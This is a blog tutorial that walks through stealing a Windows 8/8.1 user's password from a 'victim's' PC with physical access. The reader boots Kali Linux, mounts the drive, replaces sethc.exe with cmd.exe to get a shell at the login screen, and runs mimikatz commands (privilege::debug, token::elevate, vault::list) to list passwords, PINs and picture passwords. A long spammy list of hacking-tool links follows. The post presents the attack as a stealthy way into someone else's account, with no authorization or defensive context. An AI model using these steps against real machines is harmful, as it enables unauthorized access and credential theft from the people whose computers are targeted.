You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...
Requirements:
- A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
- Mimikatz (Download | Blog)
- Physical Access to victim's machine
- A Working Brain in that Big Head (Download Here)
Steps:
1. First of all download mimikatz and put it in a pendrive.2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window
3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:
mkdir /media/win
ntfs-3g /dev/sda1 /media/win
[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.
4. Now navigate to the System32 folder using the following command
cd /media/win/Windows/System32
5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:
mv sethc.exe sethc.exe.bak
sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.
6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:
cp cmd.exe sethc.exe
[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality
7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.
8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this
9. Now navigate to your usb drive in my case its drive G:
10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)
11. Run mimikatz and type the following commands one after the other in sequence:
privilege::debug
token::elevate
vault::list
the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)
That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...
Hope you enjoyed the tutorial have fun :)
Related posts
- Nsa Hack Tools
- Pentest Tools Kali Linux
- Pentest Tools Free
- What Is Hacking Tools
- Nsa Hacker Tools
- Hacking Tools
- Hacking Tools Kit
- Hacker Tools Windows
- How To Make Hacking Tools
- Hacking Tools For Mac
- Hacking Tools Windows 10
- Hacking Tools And Software
- Pentest Tools Alternative
- Hacker Tools Online
- Hacking Tools Software
- Blackhat Hacker Tools
- How To Make Hacking Tools
- Hacking Tools Online
- Hacker Tools Mac
- Pentest Tools Android
- Github Hacking Tools
- Usb Pentest Tools
- Hacker Tools Free Download
- Hack Tool Apk No Root
- Pentest Tools Windows
- Pentest Tools Url Fuzzer
- Pentest Tools Url Fuzzer
- Pentest Tools Open Source
- Hacking Tools Free Download
- Hackers Toolbox
- Pentest Tools Review
- Hacking Tools Online
- Pentest Tools Review
- Hacking Tools
- Hacker Search Tools
- Hack Tools Mac
- Game Hacking
- Beginner Hacker Tools
- Hack App
- Pentest Tools Free
- Pentest Tools Url Fuzzer
- Pentest Tools Download
- Ethical Hacker Tools
- Hacker Tool Kit
- Pentest Tools Alternative
- Hacker
- Hacking Tools
- Hacker Tools Github
- Pentest Tools Online
- Hacker Tools Free
- Nsa Hack Tools Download
- Beginner Hacker Tools
- Hacker Tools Software
- Hacker Techniques Tools And Incident Handling
- Beginner Hacker Tools
- Easy Hack Tools
- Hacker Tools Software
- Hacking Tools Github
- Physical Pentest Tools
- Hack And Tools
- Pentest Tools Nmap
- New Hacker Tools
- Pentest Tools Bluekeep
- Pentest Tools Find Subdomains
- Game Hacking
- Game Hacking
- Ethical Hacker Tools
- New Hacker Tools
- Wifi Hacker Tools For Windows
- Hacker Security Tools
- Hacking Tools Pc
- Hacking Tools For Kali Linux
- Hacker
- Free Pentest Tools For Windows
- Hacker Tools Apk
- Pentest Tools Nmap
- Pentest Tools Bluekeep
- Usb Pentest Tools
- Pentest Tools List
- Hacking Tools Free Download
- Tools 4 Hack
- Hacker Security Tools
- Pentest Tools Github
- Pentest Tools Nmap
- Hack Tools For Games
- Hacker Tools List
- Hacker Tools Linux
- Wifi Hacker Tools For Windows
- Hacking Tools Usb
- Pentest Tools For Windows
- Hacker Tools Hardware
- Hacking Tools For Windows Free Download
- Hacker Techniques Tools And Incident Handling
- Usb Pentest Tools
- Tools For Hacker
- Pentest Tools Github
- Hacking Tools Name
- Hacker Tools Apk Download
- Hacker Tools For Mac
- Pentest Reporting Tools
- Hack Tools Pc
- Pentest Recon Tools
- Hacker Tools Free
- Pentest Tools For Mac
- World No 1 Hacker Software
- Hacking Tools Free Download
- Hacking Tools And Software
- Hacking Tools Hardware
- Hacker Tools Github
- Hacking Tools
- Hacking Tools Hardware
- Hacking Tools Name
- Pentest Tools Github
- Pentest Tools Nmap
- Hacking Tools For Windows
- Hack Rom Tools
- Pentest Automation Tools
- Free Pentest Tools For Windows
- Top Pentest Tools
- Hacking Tools Pc
- Pentest Tools Website Vulnerability
- Hacking Tools Kit
- Hacker Tools For Windows
- Physical Pentest Tools
- Wifi Hacker Tools For Windows
- Hack Tool Apk
- Hack Rom Tools
- Hack Rom Tools
- Pentest Tools Website
- Hacking Tools Name
- Pentest Tools Subdomain

No comments:
Post a Comment